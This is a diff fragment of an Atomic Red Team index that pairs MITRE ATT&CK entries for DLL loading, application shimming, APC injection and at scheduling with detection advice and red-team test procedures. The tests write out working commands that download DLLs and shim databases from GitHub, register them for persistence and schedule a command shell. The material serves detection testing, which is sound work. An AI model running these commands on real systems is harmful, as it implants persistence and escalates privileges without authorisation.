+ x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Process: Process Creation' + - 'Command: Command Execution' + x_mitre_contributors: + - Bencherchali Nasreddine, @nas_bench, ELIT Security Team (DSSD) + x_mitre_platforms: + - Windows + atomic_tests: [] + T1546.009: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.009 + url: https://attack.mitre.org/techniques/T1546/009 + - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process + description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: + A Technical Survey Of Common And Trending Process Injection Techniques. + Retrieved December 7, 2017.' + source_name: Elastic Process Injection July 2017 + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. + source_name: TechNet Autoruns + - url: https://forum.sysinternals.com/appcertdlls_topic12546.html + description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls. + Retrieved December 18, 2017. + source_name: Sysinternals AppCertDlls Oct 2007 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: AppCert DLLs + description: "Adversaries may establish persistence and/or elevate privileges + by executing malicious content triggered by AppCert DLLs loaded into processes. 
+ Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs + Registry key under HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session + Manager\\ are loaded into every process that calls the ubiquitously + used application programming interface (API) functions CreateProcess, + CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW, + or WinExec. (Citation: Elastic Process Injection July 2017)\n\nSimilar + to [Process Injection](https://attack.mitre.org/techniques/T1055), this value + can be abused to obtain elevated privileges by causing a malicious DLL to + be loaded and run in the context of separate processes on the computer. Malicious + AppCert DLLs may also provide persistence by continuously being triggered + by API activity. " + id: attack-pattern--7d57b371-10c2-45e5-b3cc-83a8fb380e4c + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-11-10T18:29:31.052Z' + created: '2020-01-24T14:47:41.795Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_effective_permissions: + - Administrator + - SYSTEM + x_mitre_permissions_required: + - Administrator + - SYSTEM + x_mitre_detection: "Monitor DLL loads by processes, specifically looking for + DLLs that are not recognized or not normally loaded into a process. Monitor + the AppCertDLLs Registry value for modifications that do not correlate with + known software, patch cycles, etc. Monitor and analyze application programming + interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx + and RegSetValueEx. (Citation: Elastic Process Injection July 2017) \n\nTools + such as Sysinternals Autoruns may overlook AppCert DLLs as an auto-starting + location. 
(Citation: TechNet Autoruns) (Citation: Sysinternals AppCertDlls + Oct 2007)\n\nLook for abnormal process behavior that may be due to a process + loading a malicious DLL. Data and events should not be viewed in isolation, + but as part of a chain of behavior that could lead to other activities, such + as making network connections for Command and Control, learning details about + the environment through Discovery, and conducting Lateral Movement." + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + - 'Module: Module Load' + x_mitre_platforms: + - Windows + atomic_tests: [] + T1546.010: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.010 + url: https://attack.mitre.org/techniques/T1546/010 + - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process + description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: + A Technical Survey Of Common And Trending Process Injection Techniques. + Retrieved December 7, 2017.' + source_name: Elastic Process Injection July 2017 + - url: https://support.microsoft.com/en-us/kb/197571 + description: Microsoft. (2006, October). Working with the AppInit_DLLs registry + value. Retrieved July 15, 2015. + source_name: AppInit Registry + - url: https://msdn.microsoft.com/en-us/library/dn280412 + description: Microsoft. (n.d.). AppInit DLLs and Secure Boot. Retrieved July + 15, 2015. + source_name: AppInit Secure Boot + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. 
+ source_name: TechNet Autoruns + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: AppInit DLLs + description: "Adversaries may establish persistence and/or elevate privileges + by executing malicious content triggered by AppInit DLLs loaded into processes. + Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs + value in the Registry keys HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows + NT\\CurrentVersion\\Windows or HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows + NT\\CurrentVersion\\Windows are loaded by user32.dll into every process + that loads user32.dll. In practice this is nearly every program, since user32.dll + is a very common library. (Citation: Elastic Process Injection July 2017)\n\nSimilar + to Process Injection, these values can be abused to obtain elevated privileges + by causing a malicious DLL to be loaded and run in the context of separate + processes on the computer. (Citation: AppInit Registry) Malicious AppInit + DLLs may also provide persistence by continuously being triggered by API activity. + \n\nThe AppInit DLL functionality is disabled in Windows 8 and later versions + when secure boot is enabled. 
(Citation: AppInit Secure Boot)" + id: attack-pattern--cc89ecbd-3d33-4a41-bcca-001e702d18fd + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-11-10T18:29:31.076Z' + created: '2020-01-24T14:52:25.589Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_system_requirements: + - Secure boot disabled on systems running Windows 8 and later + x_mitre_effective_permissions: + - Administrator + - SYSTEM + x_mitre_permissions_required: + - Administrator + x_mitre_detection: "Monitor DLL loads by processes that load user32.dll and + look for DLLs that are not recognized or not normally loaded into a process. + Monitor the AppInit_DLLs Registry values for modifications that do not correlate + with known software, patch cycles, etc. Monitor and analyze application programming + interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx + and RegSetValueEx. (Citation: Elastic Process Injection July + 2017)\n\nTools such as Sysinternals Autoruns may also be used to detect system + changes that could be attempts at persistence, including listing current AppInit + DLLs. (Citation: TechNet Autoruns) \n\nLook for abnormal process behavior + that may be due to a process loading a malicious DLL. Data and events should + not be viewed in isolation, but as part of a chain of behavior that could + lead to other activities, such as making network connections for Command and + Control, learning details about the environment through Discovery, and conducting + Lateral Movement." 
+ x_mitre_data_sources: + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + - 'Module: Module Load' + x_mitre_platforms: + - Windows + identifier: T1546.010 + atomic_tests: + - name: Install AppInit Shim + auto_generated_guid: a58d9386-3080-4242-ab5f-454c16503d18 + description: "AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs + to be loaded into each user mode process on the system. Upon succesfully execution, + \nyou will see the message \"The operation completed successfully.\" Each + time the DLL is loaded, you will see a message box with a message of \"Install + AppInit Shim DLL was called!\" appear.\nThis will happen regularly as your + computer starts up various applications and may in fact drive you crazy. A + reliable way to make the message box appear and verify the \nAppInit Dlls + are loading is to start the notepad application. Be sure to run the cleanup + commands afterwards so you don't keep getting message boxes showing up\n" + supported_platforms: + - windows + input_arguments: + registry_file: + description: Windows Registry File + type: Path + default: PathToAtomicsFolder\T1546.010\src\T1546.010.reg + registry_cleanup_file: + description: Windows Registry File + type: Path + default: PathToAtomicsFolder\T1546.010\src\T1546.010-cleanup.reg + dependency_executor_name: powershell + dependencies: + - description: 'Reg files must exist on disk at specified locations (#{registry_file} + and #{registry_cleanup_file}) + +' + prereq_command: 'if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) + {exit 0} else {exit 1} + +' + get_prereq_command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + New-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/src/T1546.010.reg" -OutFile 
"#{registry_file}" + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/src/T1546.010-cleanup.reg" -OutFile "#{registry_cleanup_file}" + - description: 'DLL''s must exist in the C:\Tools directory (T1546.010.dll and + T1546.010x86.dll) + +' + prereq_command: 'if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll)) + {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010x86.dll" -OutFile C:\Tools\T1546.010x86.dll + executor: + command: 'reg.exe import #{registry_file} + +' + cleanup_command: 'reg.exe import #{registry_cleanup_file} >nul 2>&1 + +' + name: command_prompt + elevation_required: true + T1546.011: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.011 + url: https://attack.mitre.org/techniques/T1546/011 + - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process + description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: + A Technical Survey Of Common And Trending Process Injection Techniques. + Retrieved December 7, 2017.' + source_name: Elastic Process Injection July 2017 + - source_name: FireEye Application Shimming + url: http://files.brucon.org/2015/Tomczak_and_Ballenthin_Shims_for_the_Win.pdf + description: Ballenthin, W., Tomczak, J.. (2015). The Real Shim Shary. Retrieved + May 4, 2020. + - url: https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf + description: Pierce, Sean. (2015, November). Defending Against Malicious Application + Compatibility Shims. 
Retrieved June 22, 2017. + source_name: Black Hat 2015 App Shim + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Application Shimming + description: "Adversaries may establish persistence and/or elevate privileges + by executing malicious content triggered by application shims. The Microsoft + Windows Application Compatibility Infrastructure/Framework (Application Shim) + was created to allow for backward compatibility of software as the operating + system codebase changes over time. For example, the application shimming feature + allows developers to apply fixes to applications (without rewriting code) + that were created for Windows XP so that it will work with Windows 10. (Citation: + Elastic Process Injection July 2017)\n\nWithin the framework, shims are created + to act as a buffer between the program (or more specifically, the Import Address + Table) and the Windows OS. When a program is executed, the shim cache is referenced + to determine if the program requires the use of the shim database (.sdb). + If so, the shim database uses hooking to redirect the code as necessary in + order to communicate with the OS. \n\nA list of all shims currently installed + by the default Windows installer (sdbinst.exe) is kept in:\n\n* %WINDIR%\\AppPatch\\sysmain.sdb + and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\installedsdb\n\nCustom + databases are stored in:\n\n* %WINDIR%\\AppPatch\\custom & %WINDIR%\\AppPatch\\AppPatch64\\Custom + and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\custom\n\nTo + keep shims secure, Windows designed them to run in user mode so they cannot + modify the kernel and you must have administrator privileges to install a + shim. 
However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) + (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data + Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), + and intercept memory addresses (GetProcAddress).\n\nUtilizing these shims + may allow an adversary to perform several malicious acts such as elevate privileges, + install backdoors, disable defenses like Windows Defender, etc. (Citation: + FireEye Application Shimming) Shims can also be abused to establish persistence + by continuously being invoked by affected programs." + id: attack-pattern--42fe883a-21ea-4cfb-b94a-78b6476dcc83 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-11-10T18:29:31.094Z' + created: '2020-01-24T14:56:24.231Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + x_mitre_detection: |- + There are several public tools available that will detect shims that are currently available (Citation: Black Hat 2015 App Shim): + + * Shim-Process-Scanner - checks memory of every running process for any shim flags + * Shim-Detector-Lite - detects installation of custom shim databases + * Shim-Guard - monitors registry for any shim installations + * ShimScanner - forensic tool to find active shims in memory + * ShimCacheMem - Volatility plug-in that pulls shim cache from memory (note: shims are only cached after reboot) + + Monitor process execution for sdbinst.exe and command-line arguments for potential indications of application shim abuse. 
+ x_mitre_data_sources: + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + - 'Module: Module Load' + - 'File: File Modification' + x_mitre_platforms: + - Windows + identifier: T1546.011 + atomic_tests: + - name: Application Shim Installation + auto_generated_guid: 9ab27e22-ee62-4211-962b-d36d9a0e6a18 + description: "Install a shim database. This technique is used for privilege + escalation and bypassing user access control.\nUpon execution, \"Installation + of AtomicShim complete.\" will be displayed. To verify the shim behavior, + run \nthe AtomicTest.exe from the \\\\T1546.011\\\\bin + directory. You should see a message box appear\nwith \"Atomic Shim DLL Test!\" + as defined in the AtomicTest.dll. To better understand what is happening, + review\nthe source code files is the \\\\T1546.011\\\\src + directory.\n" + supported_platforms: + - windows + input_arguments: + file_path: + description: Path to the shim database file + type: String + default: PathToAtomicsFolder\T1546.011\bin\AtomicShimx86.sdb + dependency_executor_name: powershell + dependencies: + - description: 'Shim database file must exist on disk at specified location + (#{file_path}) + +' + prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} + +' + get_prereq_command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb" -OutFile "#{file_path}" + - description: 'AtomicTest.dll must exist at c:\Tools\AtomicTest.dll + +' + prereq_command: 'if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit + 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path c:\Tools\AtomicTest.dll) -ErrorAction ignore | Out-Null + Invoke-WebRequest 
"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicTest.dll" -OutFile c:\Tools\AtomicTest.dll + executor: + command: 'sdbinst.exe #{file_path} + +' + cleanup_command: 'sdbinst.exe -u #{file_path} >nul 2>&1 + +' + name: command_prompt + elevation_required: true + - name: New shim database files created in the default shim database directory + auto_generated_guid: aefd6866-d753-431f-a7a4-215ca7e3f13d + description: | + Upon execution, check the "C:\Windows\apppatch\Custom\" folder for the new shim database + + https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html + supported_platforms: + - windows + executor: + command: | + Copy-Item $PathToAtomicsFolder\T1546.011\bin\T1546.011CompatDatabase.sdb C:\Windows\apppatch\Custom\T1546.011CompatDatabase.sdb + Copy-Item $PathToAtomicsFolder\T1546.011\bin\T1546.011CompatDatabase.sdb C:\Windows\apppatch\Custom\Custom64\T1546.011CompatDatabase.sdb + cleanup_command: | + Remove-Item C:\Windows\apppatch\Custom\T1546.011CompatDatabase.sdb -ErrorAction Ignore + Remove-Item C:\Windows\apppatch\Custom\Custom64\T1546.011CompatDatabase.sdb -ErrorAction Ignore + name: powershell + elevation_required: true + - name: Registry key creation and/or modification events for SDB + auto_generated_guid: 9b6a06f9-ab5e-4e8d-8289-1df4289db02f + description: | + Create registry keys in locations where fin7 typically places SDB patches. Upon execution, output will be displayed describing + the registry keys that were created. These keys can also be viewed using the Registry Editor. 
+ + https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html + supported_platforms: + - windows + executor: + command: | + New-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" -Name "AtomicRedTeamT1546.011" -Value "AtomicRedTeamT1546.011" + New-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1546.011" -Value "AtomicRedTeamT1546.011" + cleanup_command: | + Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" -Name "AtomicRedTeamT1546.011" -ErrorAction Ignore + Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1546.011" -ErrorAction Ignore + name: powershell + elevation_required: true + T1055.004: + technique: + external_references: + - source_name: mitre-attack + external_id: T1055.004 + url: https://attack.mitre.org/techniques/T1055/004 + - url: https://msdn.microsoft.com/library/windows/desktop/ms681951.aspx + description: Microsoft. (n.d.). Asynchronous Procedure Calls. Retrieved December + 8, 2017. + source_name: Microsoft APC + - url: https://www.cyberbit.com/blog/endpoint-security/new-early-bird-code-injection-technique-discovered/ + description: Gavriel, H. & Erbesfeld, B. (2018, April 11). New ‘Early Bird’ + Code Injection Technique Discovered. Retrieved May 24, 2018. + source_name: CyberBit Early Bird Apr 2018 + - url: https://blog.ensilo.com/atombombing-brand-new-code-injection-for-windows + description: 'Liberman, T. (2016, October 27). ATOMBOMBING: BRAND NEW CODE + INJECTION FOR WINDOWS. Retrieved December 8, 2017.' + source_name: ENSIL AtomBombing Oct 2016 + - url: https://msdn.microsoft.com/library/windows/desktop/ms649053.aspx + description: Microsoft. (n.d.). About Atom Tables. Retrieved December 8, 2017. 
+ source_name: Microsoft Atom Table + - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process + description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: + A Technical Survey Of Common And Trending Process Injection Techniques. + Retrieved December 7, 2017.' + source_name: Elastic Process Injection July 2017 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Asynchronous Procedure Call + description: "Adversaries may inject malicious code into processes via the asynchronous + procedure call (APC) queue in order to evade process-based defenses as well + as possibly elevate privileges. APC injection is a method of executing arbitrary + code in the address space of a separate live process. \n\nAPC injection is + commonly performed by attaching malicious code to the APC Queue (Citation: + Microsoft APC) of a process's thread. Queued APC functions are executed when + the thread enters an alterable state.(Citation: Microsoft APC) A handle to + an existing victim process is first created with native Windows API calls + such as OpenThread. At this point QueueUserAPC can + be used to invoke a function (such as LoadLibrayA pointing to + a malicious DLL). \n\nA variation of APC injection, dubbed \"Early Bird injection\", + involves creating a suspended process in which malicious code can be written + and executed before the process' entry point (and potentially subsequent anti-malware + hooks) via an APC. 
(Citation: CyberBit Early Bird Apr 2018) AtomBombing (Citation: + ENSIL AtomBombing Oct 2016) is another variation that utilizes APCs to invoke + malicious code previously written to the global atom table.(Citation: Microsoft + Atom Table)\n\nRunning code in the context of another process may allow access + to the process's memory, system/network resources, and possibly elevated privileges. + Execution via APC injection may also evade detection from security products + since the execution is masked under a legitimate process. " + id: attack-pattern--7c0f17c9-1af6-4628-9cbd-9e45482dd605 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-11-10T18:29:30.961Z' + created: '2020-01-14T01:29:43.786Z' + x_mitre_defense_bypassed: + - Application control + - Anti-virus + x_mitre_data_sources: + - 'Process: OS API Execution' + - 'Process: Process Access' + x_mitre_detection: "Monitoring Windows API calls indicative of the various types + of code injection may generate a significant amount of data and may not be + directly useful for defense unless collected under specific circumstances + for known bad sequences of calls, since benign use of API functions may be + common and difficult to distinguish from malicious behavior. Windows API calls + such as SuspendThread/SetThreadContext/ResumeThread, + QueueUserAPC/NtQueueApcThread, and those that can + be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, + may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze + process behavior to determine if a process is performing actions it usually + does not, such as opening network connections, reading files, or other suspicious + actions that could relate to post-compromise behavior. 
" + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - Windows + identifier: T1055.004 + atomic_tests: + - name: Process Injection via C# + auto_generated_guid: 611b39b7-e243-4c81-87a4-7145a90358b1 + description: | + Process Injection using C# + reference: https://github.com/pwndizzle/c-sharp-memory-injection + Excercises Five Techniques + 1. Process injection + 2. ApcInjectionAnyProcess + 3. ApcInjectionNewProcess + 4. IatInjection + 5. ThreadHijack + Upon successful execution, cmd.exe will execute T1055.exe, which exercises 5 techniques. Output will be via stdout. + supported_platforms: + - windows + input_arguments: + exe_binary: + description: Output Binary + type: Path + default: PathToAtomicsFolder\T1055.004\bin\T1055.exe + executor: + command: "#{exe_binary}\n" + name: command_prompt + T1053.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1053.001 + url: https://attack.mitre.org/techniques/T1053/001 + - source_name: Kifarunix - Task Scheduling in Linux + url: https://kifarunix.com/scheduling-tasks-using-at-command-in-linux/ + description: Koromicha. (2019, September 7). Scheduling tasks using at command + in Linux. Retrieved December 3, 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: At (Linux) + description: |- + Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) command within Linux operating systems enables administrators to schedule tasks.(Citation: Kifarunix - Task Scheduling in Linux) + + An adversary may use [at](https://attack.mitre.org/software/S0110) in Linux environments to execute programs at system startup or on a scheduled basis for persistence. 
[at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account. + id: attack-pattern--6636bc83-0611-45a6-b74f-1f3daf635b8e + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-23T22:35:13.112Z' + created: '2019-12-03T12:59:36.749Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_remote_support: true + x_mitre_detection: "Monitor scheduled task creation using command-line invocation. + Legitimate scheduled tasks may be created during installation of new software + or through system administration functions. Look for changes to tasks that + do not correlate with known software, patch cycles, etc. \n\nSuspicious program + execution through scheduled tasks may show up as outlier processes that have + not been seen before when compared against historical data. Data and events + should not be viewed in isolation, but as part of a chain of behavior that + could lead to other activities, such as network connections made for Command + and Control, learning details about the environment through Discovery, and + Lateral Movement." + x_mitre_data_sources: + - 'Scheduled Job: Scheduled Job Creation' + - 'Command: Command Execution' + - 'Process: Process Creation' + x_mitre_platforms: + - Linux + identifier: T1053.001 + atomic_tests: + - name: At - Schedule a job + auto_generated_guid: 7266d898-ac82-4ec0-97c7-436075d0d08e + description: 'This test submits a command to be run in the future by the `at` + daemon. 
+ +' + supported_platforms: + - linux + input_arguments: + time_spec: + description: Time specification of when the command should run + type: String + default: now + 1 minute + at_command: + description: The command to be run + type: String + default: echo Hello from Atomic Red Team + dependency_executor_name: sh + dependencies: + - description: 'The `at` and `atd` executables must exist in the PATH + +' + prereq_command: 'which at && which atd + +' + get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found + in the PATH (Package name: `at`)'' + +' + - description: 'The `atd` daemon must be running + +' + prereq_command: 'systemctl status atd || service atd status + +' + get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service + atd start` ; systemd: `systemctl start atd`)'' + +' + executor: + name: sh + elevation_required: false + command: 'echo "#{at_command}" | at #{time_spec} + +' + T1053.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1053.002 + url: https://attack.mitre.org/techniques/T1053/002 + - url: https://twitter.com/leoloobeek/status/939248813465853953 + description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved + December 12, 2017. + source_name: Twitter Leoloobeek Scheduled Task + - url: https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen + description: Satyajit321. (2015, November 3). Scheduled Tasks History Retention + settings. Retrieved December 12, 2017. + source_name: TechNet Forum Scheduled Task Operational Setting + - url: https://technet.microsoft.com/library/dd315590.aspx + description: Microsoft. (n.d.). General Task Registration. Retrieved December + 12, 2017. 
+ source_name: TechNet Scheduled Task Events + - source_name: Microsoft Scheduled Task Events Win10 + url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events + description: Microsoft. (2017, May 28). Audit Other Object Access Events. + Retrieved June 27, 2019. + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. + source_name: TechNet Autoruns + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: At (Windows) + description: "Adversaries may abuse the at.exe utility to perform + task scheduling for initial or recurring execution of malicious code. The + [at](https://attack.mitre.org/software/S0110) utility exists as an executable + within Windows for scheduling tasks at a specified time and date. Using [at](https://attack.mitre.org/software/S0110) + requires that the Task Scheduler service be running, and the user to be logged + on as a member of the local Administrators group. \n\nAn adversary may use + at.exe in Windows environments to execute programs at system + startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) + can also be abused to conduct remote Execution as part of Lateral Movement + and or to run a process under the context of a specified account (such as + SYSTEM).\n\nNote: The at.exe command line utility has been deprecated + in current versions of Windows in favor of schtasks." 
+ id: attack-pattern--f3d95a1f-bba2-44ce-9af7-37866cd63fd0 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-24T13:43:40.776Z' + created: '2019-11-27T13:52:45.853Z' + x_mitre_data_sources: + - 'Scheduled Job: Scheduled Job Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_remote_support: true + x_mitre_permissions_required: + - Administrator + x_mitre_detection: |- + Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc. + + Configure event logging for scheduled task creation and changes by enabling the "Microsoft-Windows-TaskScheduler/Operational" setting within the event logging service. 
(Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10) + + * Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered + * Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated + * Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted + * Event ID 4698 on Windows 10, Server 2016 - Scheduled task created + * Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled + * Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled + + Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns) + + Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data. + x_mitre_platforms: + - Windows + identifier: T1053.002 + atomic_tests: + - name: At.exe Scheduled task + auto_generated_guid: 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 + description: | + Executes cmd.exe + Note: deprecated in Windows 8+ + + Upon successful execution, cmd.exe will spawn at.exe and create a scheduled task that will spawn cmd at a specific time. 
+ supported_platforms: + - windows + executor: + name: command_prompt + elevation_required: false + command: 'at 13:20 /interactive cmd + +' + T1547.002: + technique: + id: attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec + description: |- + Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. (Citation: MSDN Authentication Packages) + + Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ with the key value of "Authentication Packages"=<target binary>. The binary will then be executed by the system when the authentication packages are loaded. + name: Authentication Package + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1547.002 + url: https://attack.mitre.org/techniques/T1547/002 + - url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx + description: Microsoft. (n.d.). Authentication Packages. Retrieved March 1, + 2017. + source_name: MSDN Authentication Packages + - url: http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html + description: Graeber, M. (2014, October). Analysis of Malicious Security 